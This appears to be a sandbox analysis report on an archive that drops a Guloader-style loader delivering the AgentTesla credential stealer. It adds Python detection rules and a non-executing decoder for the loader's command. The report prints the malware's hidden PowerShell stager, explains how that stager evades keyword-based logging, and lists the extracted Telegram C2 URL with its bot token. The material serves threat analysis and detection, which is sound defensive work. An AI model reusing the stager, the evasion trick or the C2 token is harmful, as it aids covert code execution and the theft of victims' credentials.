Overview

Overall score: 10

Task                  Platform             Score
Static                -                    3
attachments.zip       windows7-x64         1
attachments.zip       windows10-2004-x64   1
226350194-...64.rar   windows7-x64         10
226350194-...64.rar   windows10-2004-x64   7
226350194-...64.exe   windows7-x64         10
226350194-...64.exe   windows10-2004-x64   10
Civilhorto...ng.sko   windows7-x64         3
Civilhorto...ng.sko   windows10-2004-x64   3
Ejerkredse...31.don   windows7-x64         3
Ejerkredse...31.don   windows10-2004-x64   3
Ejerkredse...ng.ps1   windows7-x64         8
Ejerkredse...ng.ps1   windows10-2004-x64   8
Sudsers34/...se.ant   windows7-x64         3
Sudsers34/...se.ant   windows10-2004-x64   3
Sudsers34/...ns.oxo   windows7-x64         3
Sudsers34/...ns.oxo   windows10-2004-x64   3
Telekablet...st.txt   windows7-x64         1
Telekablet...st.txt   windows10-2004-x64   1

Analysis
max time kernel: 157s
max time network: 159s
platform: windows7_x64
resource: win7-20240221-en
resource tags: arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
submitted: 07/03/2024, 13:15
Static task
static1

Behavioral tasks
behavioral1    attachments.zip                                                  win7-20240220-en
behavioral2    attachments.zip                                                  win10v2004-20240226-en
behavioral3    226350194-050944-sanlccjavap0003-11764.rar                      win7-20240221-en
behavioral4    226350194-050944-sanlccjavap0003-11764.rar                      win10v2004-20240226-en
behavioral5    226350194-050944-sanlccjavap0003-11764.exe                      win7-20240221-en
behavioral6    226350194-050944-sanlccjavap0003-11764.exe                      win10v2004-20240226-en
behavioral7    Civilhortonoms/Dyretmmersken/Mealybug/Laesning.sko              win7-20240221-en
behavioral8    Civilhortonoms/Dyretmmersken/Mealybug/Laesning.sko              win10v2004-20240226-en
behavioral9    Ejerkredsen/Lulledes/Filateliens31.don                          win7-20240221-en
behavioral10   Ejerkredsen/Lulledes/Filateliens31.don                          win10v2004-20240226-en
behavioral11   Ejerkredsen/Lulledes/Preconizing.ps1                            win7-20240221-en
behavioral12   Ejerkredsen/Lulledes/Preconizing.ps1                            win10v2004-20240226-en
behavioral13   Sudsers34/Neoterist/Opslagsbindenes/Oplivelse/indsigelse.ant    win7-20240221-en
behavioral14   Sudsers34/Neoterist/Opslagsbindenes/Oplivelse/indsigelse.ant    win10v2004-20240226-en
behavioral15   Sudsers34/Neoterist/Opslagsbindenes/Oplivelse/smreostens.oxo    win7-20240221-en
behavioral16   Sudsers34/Neoterist/Opslagsbindenes/Oplivelse/smreostens.oxo    win10v2004-20240226-en
behavioral17   Telekablets/krakileres/miditest/Herpetotomist.txt               win7-20240221-en
behavioral18   Telekablets/krakileres/miditest/Herpetotomist.txt               win10v2004-20240226-en
General

Target: 226350194-050944-sanlccjavap0003-11764.rar
Size: 488KB
MD5: 3d0f594ee92bed02cbb787b2c50f6896
SHA1: 8e61a5560a22ca39369d781af051249f703562cb
SHA256: dd417f9b28a642ad5b273b300099d785e84d8bc89514cb4c7703558de5f0d615
SHA512: 32c26ab4bf9640b4529cfec87de19b83ff1d309280844b12303ae01d79483194dbac77ab8e68fbd9adfcf489dd64e5682b5a87fc39ae625d1f93aa60e911ef67
SSDEEP: 12288:wmDS02BY1vuQ7pf9SWj1LdvFZwmjNWxsiu5eNMJ2GRWqevQp:wm8BYcQ7pf9Z1LDsgFJ2GR8Qp
Malware Config

Extracted family: agenttesla
C2 (Telegram Bot API endpoint): https://api.telegram.org/bot5147163644:AAEDa60jT_0f_OgilwiEp-CBiARVO2Rx3Mo/
Signatures

AgentTesla
Agent Tesla is a .NET-based remote access tool (RAT) and credential stealer.

Guloader, Cloudeye
A shellcode-based downloader first seen in 2020.

Executes dropped EXE (1 IoC)
PID 2372  226350194-050944-sanlccjavap0003-11764.exe

Loads dropped DLL (2 IoCs)
PID 1996  powershell.exe (2 events)

Suspicious use of NtCreateThreadExHideFromDebugger (1 IoC)
PID 1760  wab.exe

Suspicious use of NtSetInformationThreadHideFromDebugger (2 IoCs)
PID 1996  powershell.exe
PID 1760  wab.exe

Suspicious use of SetThreadContext (1 IoC)
PID 1996 (powershell.exe) set thread context of PID 1760 (wab.exe), procid_target 36

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).

NSIS installer (2 IoCs)
resource: behavioral3/files/0x002600000001447e-34.dat
yara rules: nsis_installer_1, nsis_installer_2

Suspicious behavior: EnumeratesProcesses (12 IoCs)
PID 1996  powershell.exe (8 events)
PID 2692  7zFM.exe (2 events)
PID 1760  wab.exe (2 events)

Suspicious behavior: GetForegroundWindowSpam (1 IoC)
PID 2692  7zFM.exe

Suspicious behavior: MapViewOfSection (1 IoC)
PID 1996  powershell.exe

Suspicious use of AdjustPrivilegeToken (5 IoCs)
PID 2692  7zFM.exe        Token: SeRestorePrivilege
PID 2692  7zFM.exe        Token: 35
PID 2692  7zFM.exe        Token: SeSecurityPrivilege
PID 1996  powershell.exe  Token: SeDebugPrivilege
PID 1760  wab.exe         Token: SeDebugPrivilege

Suspicious use of FindShellTrayWindow (3 IoCs)
PID 2692  7zFM.exe (3 events)

Suspicious use of WriteProcessMemory (21 IoCs)
PID 3048 (cmd.exe) wrote to memory of PID 2692 (7zFM.exe), procid_target 28 (3 events)
PID 2692 (7zFM.exe) wrote to memory of PID 2372 (226350194-050944-sanlccjavap0003-11764.exe), procid_target 31 (4 events)
PID 2372 (226350194-050944-sanlccjavap0003-11764.exe) wrote to memory of PID 1996 (powershell.exe), procid_target 32 (4 events)
PID 1996 (powershell.exe) wrote to memory of PID 1468 (cmd.exe), procid_target 34 (4 events)
PID 1996 (powershell.exe) wrote to memory of PID 1760 (wab.exe), procid_target 36 (6 events)

Note on reading the WriteProcessMemory rows: a parent writing into a child it has just created (cmd.exe into 7zFM.exe, 7zFM.exe into the extracted .exe, the .exe into powershell.exe) is the ordinary process-startup write and on its own says nothing. The pair that matters is powershell.exe (1996) into wab.exe (1760): six writes, plus SetThreadContext and MapViewOfSection from the same PID against the same target, is the footprint of a hollowed or injected process, and wab.exe then setting hide-from-debugger flags on its own threads and taking SeDebugPrivilege is behaviour of injected code, not of Windows Contacts.
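The signature rows above are raw telemetry; a detection has to encode the parent/child relationships and command-line shapes they show. The following is an added example, not part of the sandbox report and not the sandbox's own scoring logic: Python detection rules run over process-creation events reconstructed from this report's process tree (PIDs, images and command lines are the ones on this page; the parent links follow the tree nesting). The `7zO<hex>` temp-path pattern, the `-WindowStyle` prefix handling and the allowed-parent list for wab.exe are assumptions made for the example, not findings of the report.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple


@dataclass
class Proc:
    pid: int
    ppid: Optional[int]   # None for the root of the recorded tree
    image: str
    cmdline: str


# Process-creation events reconstructed from the report's tree. Constructed test
# input for this example, not raw sandbox or EDR telemetry.
EVENTS: List[Proc] = [
    Proc(3048, None, r"C:\Windows\system32\cmd.exe",
         r"cmd /c C:\Users\Admin\AppData\Local\Temp\226350194-050944-sanlccjavap0003-11764.rar"),
    Proc(2692, 3048, r"C:\Program Files\7-Zip\7zFM.exe",
         r'"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\226350194-050944-sanlccjavap0003-11764.rar"'),
    Proc(2372, 2692, r"C:\Users\Admin\AppData\Local\Temp\7zO48AC4A77\226350194-050944-sanlccjavap0003-11764.exe",
         r'"C:\Users\Admin\AppData\Local\Temp\7zO48AC4A77\226350194-050944-sanlccjavap0003-11764.exe"'),
    Proc(1996, 2372, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
         r'"powershell.exe" -windowstyle hidden "$angstfyldtes=Get-Content '
         r"'C:\Users\Admin\AppData\Local\aftgtstilsagnenes\Ejerkredsen\Lulledes\Preconizing.Nig';"
         r'$Bombeeksperterne=$angstfyldtes.SubString(58929,3);.$Bombeeksperterne($angstfyldtes)"'),
    Proc(1468, 1996, r"C:\Windows\SysWOW64\cmd.exe",
         r'"C:\Windows\system32\cmd.exe" /c "set /A 1^^0"'),
    Proc(1760, 1996, r"C:\Program Files (x86)\windows mail\wab.exe",
         r'"C:\Program Files (x86)\windows mail\wab.exe"'),
]

# 7-Zip's GUI extracts a double-clicked archive member to %TEMP%\7zO<hex>\ before running it
# (assumed pattern; the page shows one instance, 7zO48AC4A77).
SEVENZIP_TEMP = re.compile(r"\\AppData\\Local\\Temp\\7zO[0-9A-Fa-f]+\\", re.IGNORECASE)
# powershell.exe accepts any unambiguous prefix of -WindowStyle (-w, -win, ...), so match them all.
_WS = "windowstyle"
HIDDEN_WINDOW = re.compile(
    r"-(?:" + "|".join(_WS[:i] for i in range(len(_WS), 0, -1)) + r")\s+hidden\b", re.IGNORECASE)
# Read a file, slice a command name out of it, invoke that name on the file body: .$name($body)
GETCONTENT_INVOKE = re.compile(r"Get-Content\b.*\.SubString\(.*\.\$\w+\(", re.IGNORECASE | re.DOTALL)
# wab.exe (Windows Contacts) is normally started interactively; explorer.exe is the only parent
# allowed here. Assumption to tune per environment.
WAB_ALLOWED_PARENTS = {"explorer.exe"}


def base(image: str) -> str:
    return image.rsplit("\\", 1)[-1].lower()


def detect(events: List[Proc]) -> List[Tuple[str, int]]:
    """Return (rule_name, pid) for every event that trips a rule."""
    by_pid = {p.pid: p for p in events}
    hits: List[Tuple[str, int]] = []
    for p in events:
        parent = by_pid.get(p.ppid) if p.ppid is not None else None
        pbase = base(parent.image) if parent else ""
        name = base(p.image)
        if name.endswith(".exe") and SEVENZIP_TEMP.search(p.image):
            hits.append(("exe_run_from_7zip_temp", p.pid))
        if name == "powershell.exe":
            if HIDDEN_WINDOW.search(p.cmdline) and GETCONTENT_INVOKE.search(p.cmdline):
                hits.append(("hidden_powershell_getcontent_substring_invoke", p.pid))
            if parent is not None and SEVENZIP_TEMP.search(parent.image):
                hits.append(("powershell_child_of_archive_extracted_exe", p.pid))
        if name == "wab.exe" and parent is not None and pbase not in WAB_ALLOWED_PARENTS:
            hits.append(("wab_exe_unusual_parent", p.pid))
        if name == "cmd.exe" and pbase == "powershell.exe" and re.search(r"\bset\s+/A\b", p.cmdline, re.IGNORECASE):
            hits.append(("powershell_cmd_set_a_arithmetic", p.pid))
    return hits


def ancestry(events: List[Proc], pid: int) -> List[str]:
    """Image basenames from the recorded root down to `pid`, for the analyst's one-line summary."""
    by_pid = {p.pid: p for p in events}
    chain: List[str] = []
    cur = by_pid.get(pid)
    while cur is not None:
        chain.append(base(cur.image))
        cur = by_pid.get(cur.ppid) if cur.ppid is not None else None
    return chain[::-1]


if __name__ == "__main__":
    for rule, pid in detect(EVENTS):
        print(f"{rule:50} PID {pid}")
    print(" -> ".join(ancestry(EVENTS, 1760)))
```

The `set /A` rule is deliberately kept separate and weak: on its own a cmd.exe arithmetic call is noise, but chained under a hidden PowerShell that was itself spawned by an archive-extracted executable it is part of the same tree and worth surfacing alongside the strong hits.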
Processes

C:\Windows\system32\cmd.exe  (PID 3048)
  cmd /c C:\Users\Admin\AppData\Local\Temp\226350194-050944-sanlccjavap0003-11764.rar
  - Suspicious use of WriteProcessMemory

  C:\Program Files\7-Zip\7zFM.exe  (PID 2692)
    "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\226350194-050944-sanlccjavap0003-11764.rar"
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of WriteProcessMemory

    C:\Users\Admin\AppData\Local\Temp\7zO48AC4A77\226350194-050944-sanlccjavap0003-11764.exe  (PID 2372)
      "C:\Users\Admin\AppData\Local\Temp\7zO48AC4A77\226350194-050944-sanlccjavap0003-11764.exe"
      - Executes dropped EXE
      - Suspicious use of WriteProcessMemory

      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  (PID 1996)
        "powershell.exe" -windowstyle hidden "$angstfyldtes=Get-Content 'C:\Users\Admin\AppData\Local\aftgtstilsagnenes\Ejerkredsen\Lulledes\Preconizing.Nig';$Bombeeksperterne=$angstfyldtes.SubString(58929,3);.$Bombeeksperterne($angstfyldtes)"
        - Loads dropped DLL
        - Suspicious use of NtSetInformationThreadHideFromDebugger
        - Suspicious use of SetThreadContext
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious behavior: MapViewOfSection
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory

        C:\Windows\SysWOW64\cmd.exe  (PID 1468)
          "C:\Windows\system32\cmd.exe" /c "set /A 1^^0"

        C:\Program Files (x86)\windows mail\wab.exe  (PID 1760)
          "C:\Program Files (x86)\windows mail\wab.exe"
          - Suspicious use of NtCreateThreadExHideFromDebugger
          - Suspicious use of NtSetInformationThreadHideFromDebugger
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken

How the chain fits together: the user opens the .rar in the 7-Zip GUI and runs the NSIS-packaged executable straight from 7-Zip's extraction directory under %TEMP%\7zO48AC4A77\. That executable drops its files under AppData\Local\aftgtstilsagnenes\ and launches a hidden 32-bit (SysWOW64) PowerShell whose whole job is one line: read Preconizing.Nig with Get-Content, take the three characters at offset 58929 as the name of a command, and invoke that command on the entire file body with `.$Bombeeksperterne(...)`. Neither `Invoke-Expression` nor `iex` appears on the command line, so keyword-based logging rules miss it; which command the three characters resolve to can only be confirmed from the dropped file. The SubString offset also tells you the file is one line of at least 58932 characters, because Get-Content returns a plain string (on which SubString works) only for a single-line file. PowerShell then spawns wab.exe (Windows Contacts, the 32-bit build) and, per the Signatures section, writes into it, maps a section and sets its thread context: the final stage runs inside wab.exe, which is consistent with the AgentTesla configuration extracted under Malware Config. The short-lived `cmd /c "set /A 1^^0"` child evaluates a trivial arithmetic expression and is part of the loader's own behaviour rather than anything the user asked for.
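The PowerShell command line in the tree is the stager. The following is an added example, not part of the sandbox report and not the malware's own code: a Python decoder that parses the file path, substring offset and length out of the command line and emulates the SubString call against a stand-in for Preconizing.Nig, so the invoked command is revealed without executing anything. The stand-in file content is constructed, and the three characters placed at offset 58929 (`iex`) are an assumption about what the real file resolves to; the real file was not available to check.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Command line copied from the sandbox process tree above (PID 1996).
CMDLINE = (
    '"powershell.exe" -windowstyle hidden '
    '"$angstfyldtes=Get-Content '
    "'C:\\Users\\Admin\\AppData\\Local\\aftgtstilsagnenes\\Ejerkredsen\\Lulledes\\Preconizing.Nig';"
    '$Bombeeksperterne=$angstfyldtes.SubString(58929,3);'
    '.$Bombeeksperterne($angstfyldtes)"'
)

# Shape of the stager: $c=Get-Content '<path>';$k=$c.SubString(<off>,<len>);.$k($c)
# The content and cmd groups are back-referenced, so the regex only fires when the
# same variables are reused in that order, which is what makes the pattern distinctive.
STAGER_RE = re.compile(
    r"\$(?P<content>\w+)\s*=\s*Get-Content\s+'(?P<path>[^']+)'\s*;"
    r"\s*\$(?P<cmd>\w+)\s*=\s*\$(?P=content)\.SubString\((?P<off>\d+)\s*,\s*(?P<len>\d+)\)\s*;"
    r"\s*\.\$(?P=cmd)\(\$(?P=content)\)",
    re.IGNORECASE,
)

# Names that turn a string into executed code when used as the command in `.$k(...)`.
INVOKE_NAMES = {"iex", "invoke-expression"}


@dataclass
class Stager:
    path: str
    offset: int
    length: int


def parse_stager(cmdline: str) -> Optional[Stager]:
    """Pull file path, substring offset and length out of the command line; None if no match."""
    m = STAGER_RE.search(cmdline)
    if m is None:
        return None
    return Stager(m["path"], int(m["off"]), int(m["len"]))


def resolve_command(stager: Stager, content: str) -> str:
    """Emulate [string]::Substring(offset, length) on the file body.

    Get-Content returns a single string only for a one-line file, so an offset of
    58929 implies Preconizing.Nig is one long line; `content` is treated that way here.
    """
    if stager.offset + stager.length > len(content):
        # PowerShell would throw ArgumentOutOfRangeException at this point as well.
        raise ValueError("substring out of range")
    return content[stager.offset:stager.offset + stager.length]


def is_code_execution(command: str) -> bool:
    return command.strip().lower() in INVOKE_NAMES


def triage(cmdline: str, content: str) -> dict:
    """Decode without executing: which command is invoked, and on how much data."""
    st = parse_stager(cmdline)
    if st is None:
        return {"stager": False}
    cmd = resolve_command(st, content)
    return {
        "stager": True,
        "path": st.path,
        "command": cmd,
        "executes_file_as_code": is_code_execution(cmd),
        "payload_chars": len(content),
    }


# Constructed stand-in for Preconizing.Nig (the real file was not available):
# one long line with the assumed "iex" planted exactly where the stager slices.
FAKE_FILE = "# harmless padding ".ljust(58929, "-") + "iex" + " Write-Host 'next stage would run here'"

if __name__ == "__main__":
    print(triage(CMDLINE, FAKE_FILE))
```

Run against the real dropped file, `resolve_command` gives you the answer the command line withholds; if the slice is not an invoke alias, the loader is doing something other than the usual `iex`-on-the-body trick and deserves a closer look.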
Network
MITRE ATT&CK Enterprise v15
Downloads

Filesize: 67KB
MD5: 753df6889fd7410a2e9fe333da83a429
SHA1: 3c425f16e8267186061dd48ac1c77c122962456e
SHA256: b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78
SHA512: 9d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444

Filesize: 626KB
MD5: 0d4bb5c57ce0f99b36056892cfe87f0c
SHA1: bd884e9d666bce68ef23dfa139f6477f1c50f7ab
SHA256: 0301d446fd70d25f294abb066b139bdc8d5362f86d9d10ae4c5ed13e7e6f311c
SHA512: 7d404dc721e4eb51f91956b96d3864ae2d2cc9e8c8464d446abf087b84466230ddea2662107b5d192369e8b2211b3616025628dc07f4eb679676144915dcaf6e

Filesize: 175KB
MD5: dd73cead4b93366cf3465c8cd32e2796
SHA1: 74546226dfe9ceb8184651e920d1dbfb432b314e
SHA256: a6752b7851b591550e4625b832a393aabcc428de18d83e8593cd540f7d7cae22
SHA512: ce1bdd595065c94fa528badf4a6a8777893807d6789267612755df818ba6ffe55e4df429710aea29526ee4aa8ef20e25f2f05341da53992157d21ae032c0fb63

Filesize: 348KB
MD5: edac2c2f62e371a80143df8caaec5b24
SHA1: 0b7e4c090f25b6a0ffdab3e1d4e94ea3a706584b
SHA256: ae0652e2eedf1db5506d11bdf75d677c37fb7896c64435f6afdf9161235a9616
SHA512: aa37fc1656f385b4a18c2cd8edd4c6befec3b9df14fb656bbc831274c4e1708e292e0e60e26470f3159d2ab1819b39594cc854428b65028bc468c43d3d12e3be

Filesize: 57KB
MD5: f5a06265c76853290d3b7ed1c1d3e7b9
SHA1: 4083441407a629edd297d1a480a4957740b99fd1
SHA256: f15289a9086ec32c0f072940209c5c50412dde5275dac49a8d271cb53e843eab
SHA512: 52ef36d8443eec762f2980b0ada477a9b74f0af2d0cedfb73015fbac04c28e85a85af4be6a4f67c6d7ee3b59b07abf6be2042465154ac3525e035947db15d6e8